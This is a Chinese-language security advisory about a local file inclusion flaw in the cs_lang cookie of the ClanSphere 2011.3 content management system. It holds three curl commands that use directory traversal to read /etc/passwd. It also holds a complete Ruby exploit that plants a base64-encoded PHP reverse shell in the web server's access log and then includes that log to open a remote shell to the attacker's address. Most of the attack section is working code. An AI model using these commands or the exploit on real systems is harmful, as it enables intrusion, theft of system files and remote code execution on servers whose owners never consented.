安全研究
安全漏洞
ClanSphere 2011.3 (cs_lang cookie参数)本地文件包含漏洞
发布日期:2012-10-23
更新日期:2012-10-23
受影响系统:
ClanSphere ClanSphere 2011.3描述:
ClanSphere是一个高级Web内容管理系统,主要用于搭建部落和电子竞技类网站。
Clansphere 2011.3未能正确处理cs_lang参数,在实现上存在目录遍历漏洞,可导致读取虚拟目录外的任意文件。
<*来源:blkhtc0rp
链接:http://www.exploit-db.com/exploits/22181/
http://www.metasploit.com/modules/auxiliary/scanner/http/clansphere_traversal
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
curl "http://server/" -b "blah=blah; cs_lang=../../../../../../../../../../../../../../../../etc/passwd%00.png"
curl "http://server/" -b "blah=blah; cs_lang=../../../../../../../../../../../../../../../../etc/passwd"
curl "http://server/" -b "blah=blah; cs_lang=../../../../../../../../../../../../../../../../etc/passwd%00"
Exploit:
#!/usr/bin/ruby
#
# ClanSphere 2011.3 (cs_lang) LFI exploit by blkhtc0rp
#
#
# ./clanSphere.rb "http://server/apps/clansphere_2011.3/" "/var/log/httpd/access_log" 192.168.1.221 12345
# [x] ClanSphere 2011.3 LFI Exploit
# [x] Author: blkhtc0rp
# [x] Reverse shell on 192.168.1.221:12345
#
#
# nc -lp 12345
# pwd
# /var/www/html/apps/clansphere_2011.3
# id
# uid=48(apache) gid=48(apache) groups=48(apache)
#
require 'net/http'
require 'base64'
host = ARGV[0]
log = ARGV[1]
ip = ARGV[2]
rev_port = ARGV[3]
abort("Usage: #{$0} <url> <log> <your_ip> <port>") unless ARGV.size == 4
uri = URI.parse(host)
cookie = "blah=blah; cs_lang=../../../../../../../../../../../../../../../.." + log + "%00.png"
headers = { 'Cookie' => cookie,
'User-Agent' => 'Mozilla/4.0 (PSP (PlayStation Portable); 5.03)'
}
# Tiny shell from the net lol.
shell = "\$ip = \'#{ip}\';\$port = #{rev_port}; if (!(\$sock=fsockopen(\$ip,\$port))) die; while(!feof(\$sock)){ \$command = fgets(\$sock);\$pipe = popen(\$command,'r'); while (!feof(\$pipe)) fwrite (\$sock, fgets(\$pipe)); pclose(\$pipe);}fclose(\$sock);"
enc = Base64.encode64(shell).gsub("\n",'')
sh_encoded = "<?php eval(base64_decode(#{enc}));?>"
puts "[x] ClanSphere 2011.3 LFI Exploit"
puts "[x] Author: blkhtc0rp"
puts "[x] Reverse shell on #{ip}:#{rev_port}"
# Inject base64 shell
req = Net::HTTP::Get.new(sh_encoded)
status = Net::HTTP.new(uri.host, uri.port).start do |http|
http.request(req)
end
# Exec shell
req2 = Net::HTTP::Get.new(uri.path, headers)
status = Net::HTTP.new(uri.host, uri.port).start do |http|
http.request(req2)
end
建议:
厂商补丁:
ClanSphere
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.autosectools.com/
浏览次数:3064
严重程度:0(网友投票)
绿盟科技给您安全的保障